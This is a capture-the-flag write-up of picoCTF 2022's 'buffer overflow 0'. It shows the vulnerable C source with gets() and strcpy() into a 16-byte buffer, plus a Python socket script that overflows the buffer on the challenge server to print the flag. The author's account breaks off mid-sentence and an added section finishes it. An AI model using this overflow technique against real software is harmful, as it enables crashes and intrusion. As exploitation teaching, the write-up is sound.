# picoCTF 2022 buffer overflow 0 writeup

## Preface

This is my first time solving a picoCTF challenge, and I am not yet that familiar with the whole workflow, but I have still put together a short summary of how I solved this one, as a record.

## Challenge

##### AUTHOR: ALEX FULTON / PALASH OSWAL

### Description

Smash the stack

Let's start off simple, can you overflow the correct buffer? The program is available [here](https://artifacts.picoctf.net/c/520/vuln). You can view source [here](https://artifacts.picoctf.net/c/520/vuln.c). And connect with it using:

```
nc saturn.picoctf.net 53935
```

### Hints

1. How can you trigger the flag to print?
2. If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
3. Run `man gets` and read the BUGS section. How many characters can the program really read?

###### tags: `Binary Exploitation` `gets`

## Solving process

First, download the two files linked above: a C program, `vuln.c`, and an executable, `vuln`. The executable runs on Linux, and the C file is its source code, so let's start by reading the source:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>   // declares getegid()/setresgid(); not in the distributed vuln.c, added so it compiles cleanly

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

// Installed for SIGSEGV below: a crash anywhere in the program prints the flag.
void sigsegv_handler(int sig) {
  printf("%s\n", flag);
  fflush(stdout);
  exit(1);
}

// buf2 holds 16 bytes, but strcpy() copies until the NUL in input, with no bound.
void vuln(char *input){
  char buf2[16];
  strcpy(buf2, input);
}

int main(int argc, char **argv){

  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("%s %s", "Please create 'flag.txt' in this directory with your",
                    "own debugging flag.\n");
    exit(0);
  }

  fgets(flag,FLAGSIZE_MAX,f);
  signal(SIGSEGV, sigsegv_handler); // Set up signal handler

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  printf("Input: ");
  fflush(stdout);
  char buf1[100];
  gets(buf1);          // gets() has no length limit either (see hint 3)
  vuln(buf1);
  printf("The program will exit now\n");
  return 0;
}
```

We can see that `main` reads `flag.txt`, but none of that is the key point
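The source above gives the whole attack surface: `gets()` reads an unbounded line into `buf1`, `vuln()` copies it with `strcpy()` into the 16-byte `buf2`, and any resulting segmentation fault is caught by `sigsegv_handler`, which prints the flag. The script below is an added example (not part of the original writeup and not picoCTF's code) that automates the interaction over a plain TCP socket, with no pwntools dependency. The host and port are the ones given in the challenge description; the 16 + 8 + 8 byte minimum is an assumption about an x86-64 frame (buffer, saved frame pointer, return address) and the binary's actual padding is not inspected here, which is why the default payload is comfortably longer, as hint 2 suggests.

```python
"""Added solve script for picoCTF 2022 "buffer overflow 0" (example, not the page's own code)."""
import re
import socket

HOST = "saturn.picoctf.net"   # from the challenge description
PORT = 53935

BUF2_SIZE = 16
# Assumption: x86-64 frame layout, buf2 followed by saved rbp (8) and return address (8).
# Compiler padding may make the real distance larger, so send more than this minimum.
MIN_OVERFLOW = BUF2_SIZE + 8 + 8

FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")


def build_payload(length: int = 64) -> bytes:
    """Return one input line that strcpy() will copy past the end of buf2.

    The bytes must contain no NUL (strcpy stops there) and no newline
    (gets stops there), so a run of a single printable byte is enough:
    the goal is only to corrupt the return address and trigger SIGSEGV.
    """
    if length <= MIN_OVERFLOW:
        raise ValueError(f"need more than {MIN_OVERFLOW} bytes to reach the return address")
    return b"A" * length + b"\n"


def extract_flag(output: bytes):
    """Pull the picoCTF{...} token out of whatever the service sent back, or None."""
    m = FLAG_RE.search(output)
    return m.group(0).decode() if m else None


def solve(host: str = HOST, port: int = PORT, length: int = 64, timeout: float = 5.0):
    """Connect, deliver the overflow, and collect output until the handler's exit(1) closes the socket."""
    payload = build_payload(length)
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)            # consume the "Input: " prompt
        s.sendall(payload)
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:        # remote exit(1) -> EOF
                break
            chunks.append(data)
    output = b"".join(chunks)
    return extract_flag(output), output


if __name__ == "__main__":
    flag, raw = solve()
    print(flag if flag else raw.decode(errors="replace"))
```

Run it with `python3 solve.py`; if no flag is matched, the raw service output is printed instead so you can see whether the program exited normally ("The program will exit now"), which means the copy did not reach the return address and the payload should be lengthened.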